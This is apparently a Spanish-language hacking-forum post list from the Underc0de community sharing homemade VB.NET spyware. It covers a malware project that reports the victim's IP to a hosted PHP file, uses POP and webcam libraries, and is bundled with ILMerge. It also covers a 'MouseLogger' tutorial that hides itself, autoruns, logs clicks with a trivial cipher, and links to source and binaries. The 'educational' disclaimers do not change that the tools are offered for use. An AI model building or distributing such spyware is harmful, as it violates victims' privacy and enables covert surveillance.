  2.         Dim req As HttpWebRequest = WebRequest.Create("[url]http://localhost/myIp.php[/url]")
  3.         Dim res As HttpWebResponse = req.GetResponse()
  4.         Dim Stream As IO.Stream = res.GetResponseStream()
  5.         Dim sr As StreamReader = New StreamReader(Stream)
  6.         Return (sr.ReadToEnd())
  7.  
  8.     End Function

que se encuetra en
Código: vb.net
  1.  Module Systeminfo

debemos subir un archivo para lograr dicha consulta de manera que nos arroje la ip para ello lo subimos a cualquier hosting.


que se encuentra en:
Ya que el programa necesitas dll para el POP y la WebCam.


Tenemos que fusionarlos (unirlos con el exe) para así tengamos solo un archivo. Para ello será necesario de una tools muy buena ILMerge.
1.- Llevamos a una carpeta los 3 dll mas el exe y un el archivo bat (el cual dejare el link).


2.- Luego vamos a la consola y nos vamos a la ubicación de la carpeta, colocamos lo siguiente.



Seguido nos mostrara el archivo unido.

El archivo bat

Código: DOS
  1. C:\Users\Code\Desktop\Underc0de\ILMerge.exe /target:Winexe /out:underC0de2.exe underc0de.exe OpenPop.dll AForge.Video.DirectShow.dll AForge.Video.dll


Link de Codigo Fuente Underc0de.malware.exe :https://www.dropbox.com/s/8wce6hqxxoqkxr2/Underc0de.zip
Link del Decryter https://www.dropbox.com/s/khxxhvlkavsdspg/RootSecurityDecryptedEXE.zip
Link de ILMerge http://www.microsoft.com/en-us/download/details.aspx?id=17630
Link de myIp.php https://www.dropbox.com/s/4o6gsl9rcbs8bmn/myIp.zip

'*****************************************
'*****************README******************
'*****************************************
Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Un agradecimiento Especial para la comunidad que me acogio UNDERC0DE
Este proyecto es para vos.

Ya que se enceuntra en la version alfa podria tener algunos errores. Pero por el momento lo he testeado en Win7 y XP (corre de maravilla).

15
GNU/Linux / VPN con KissSecurity Ubuntu
« en: Febrero 28, 2013, 01:57:08 am »
Al ordenar mis FILES me tope con un PDF que tenia guardado por ahi y se me ocurrio compartilos con la comunidad underc0de...


Link de Descarga http://www.mediafire.com/?ze22t2h3rp7zo8l

16
Un pequeño artículo que decidi compartirlo con la comunidad underc0de.
Antes de empenzar la guía sera el Pseudocódigo.



Y los que no lo conocen, se requerira los  siguiente:
PASO 1
Ya que el programa está en .Net usaremos Win, lo primero sera capturar el proceso del Tasklist primero leer nombre del *.exe que está corriendo mediante un bucle.


PASO 2
La aplicación empezara a correr y se capturara en un *.txt debidamente encriptado con cada click hecho.



PASO 3
Luego del envió en el que solo se verá coordenadas en las que se hizo el click cada, una vez ello debemos desencriptarlo



PASO 4
Luego las coordenadas las llevaremos a una aplicación la cual las interpretara el tamaño de la pantalla y luego dibujara las coordenadas en una Form semi transparente.


PASO 5
Detrás del From estará delante la pagina web en la que se capturo el cursor y cada punto será un click .




A PROGRAMAR EL *.EXE
[/b]

En este caso fue ensamblado con el Net Framework 3.5, así que el proyecto debe estar usando dicha versión por lo que al momento de crear el Form debe colocar Net Framework 3.5.


En el Form se encuentra lo siguiente:

  • (1) ListView
        (4) Label
        (3) TextBox
        (1) RichTextBox
        (6) Timer

En el Solution Explorer se encuentra lo siguiente:


En cual se encontrara 11 Module y 1 Form. En cada línea de código se encuentra un comentario para así facilitar la comprensión del proceso.  Al momento de cambiar las propiedades del Form uno debe darse cuenta de que propiedades ha cambiado en especial ShowinTaskBar, Opacity además encontrara un Timer_Hide el cual hará de que el form pase oculto sin olvidarse del Autorun.

Lo única desventaja es que consume un 8% del procesador en mi caso Intel Core I3, se ha solucionado algunos fallos, pero si es que se encuentra alguno por favor deje su comentario y en breve se solucionara.

Descarga del Proyecto: www.dropbox.com/s/1l7mt4hey16tccg/RootSecurity.zip



A PROGRAMAR EL DECRYPTER
[/b]
Es el turno de implementar de decrypted y el form que nos mostrara los puntos en el que se hizo click. Lo explikare no es nada del otro mundo para quien ya tiene idea de programación para los que no ahi va:

Este es el código es del encrypted.

Código: vb.net
  1. Public Sub encrypted ()
  2. Dim cadena, i As String
  3. Dim inicio As Integer
  4. cadena = Convert.ToString(TextBox.Text)
  5. For inicio = 1 To Len(cadena)
  6. i = i + Chr(Asc(Mid(cadena, inicio, 1)) + 1)
  7. 'Mid lo que hace es reemplazar por el siguiente caracter
  8. TextBox.Text = i
  9. Next
  10. End Sub

Se convierte en String el texbox y se aloja en la variabale cadena. En este caso se uso el contador de variable

Len(que nos arroja el numero de caracteres que tiene la cadena de texto incluido los espacios).

Seguido del Forn que haremos un conjunto de repeticiones del el c que este caso inicio tomo valor de 1 hasta el numero de caracteres que tiene el TextBox.

Mid es el que arrojara la cantidad de caracteres que nosotros especificaremosDim palabra As String = “Root Security”

Código: vb.net
  1. Dim recorte As String = Mid(palabra,1,4)
  2. 'Siendo el resultado de esta linea de codigo la palabra “ROOT”.

Mid(cadena, inicio,1) recorrerá toda la cadena del TextBox y empezará desde 1,1 esto nos dará referencia que en la primera repetición solo tomara al primer carácter.

Asc  (http://www.elcodigoascii.com.ar/) es la función que nos devuelve el código del carácter, por ejemplo la letra R es el código ASCI 82 lo que hace después de obtener la letra por medio del Mid la convierte con código ASCI y seguido le aumenta 1 en otras palabras si se obtuvo R que era = a 82 aumentara 1 y se volverá 83.

Chr es la función que  devuelve el código en carácter en el caso anterior que escogimos R y nos arrojo 82, esta función obtendrá “R” desde 82.Dim palabra As String = Chr(82) ‘ la cual nos devolverá la letra R.Pero en el encriptado al momento de aumentarle 1 al ASC se convierte en 83 y cuando se utiliza la función Chr(83) nos mostrara el carácter “S”.

Y así continuamente para cada carácter.

En cambio el código de decrypted:

Código: vb.net
  1. Public Sub decrypted ()
  2. Dim cadena, i As String
  3. Dim inicio As Integer
  4. cadena = Convert.ToString(TextBox.Text)
  5. For inicio = 1 To Len(cadena)
  6. i = i + Chr(Asc(Mid(cadena, inicio, 1)) - 1)
  7. 'En este caso se quitara -1 carácter
  8. TextBox.Text = i
  9. Next
  10. End Sub

Se usa las mismas funciones que el anterior con el cambio de que ahora no se aumentara si no se le disminuirá -1.

Ahora nos vamos al Form que nos mostrara los puntos en el cuales se hizo click como ya sabemos que proceso se hizo click solo debemos colocar la ventana de dicho proceso de tras del from transparente.

En el Form semitransparente en el cual se dibujara en las coordenadas que uno ingresa desde el textbox, la coordenada (0,0) es la de la esquina superior izquierda llegando a la coordenada que en mi laptop es la de (1366,768) esquina inferior derecha.

Descargar código fuente: www.dropbox.com/s/oqgm8epr58y9gsg/RootSecurityDecrypted.zip
Descargar ejecutable: https://www.dropbox.com/s/khxxhvlkavsdspg/RootSecurityDecryptedEXE.zip



AVISO LEGAL
===========
MouseLogger es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que ocasiona el malware al infectar al ordenador.
No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco no me hago responsable de las copias del proyecto que sean distribuidas a través de otros portales web o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Páginas: [1]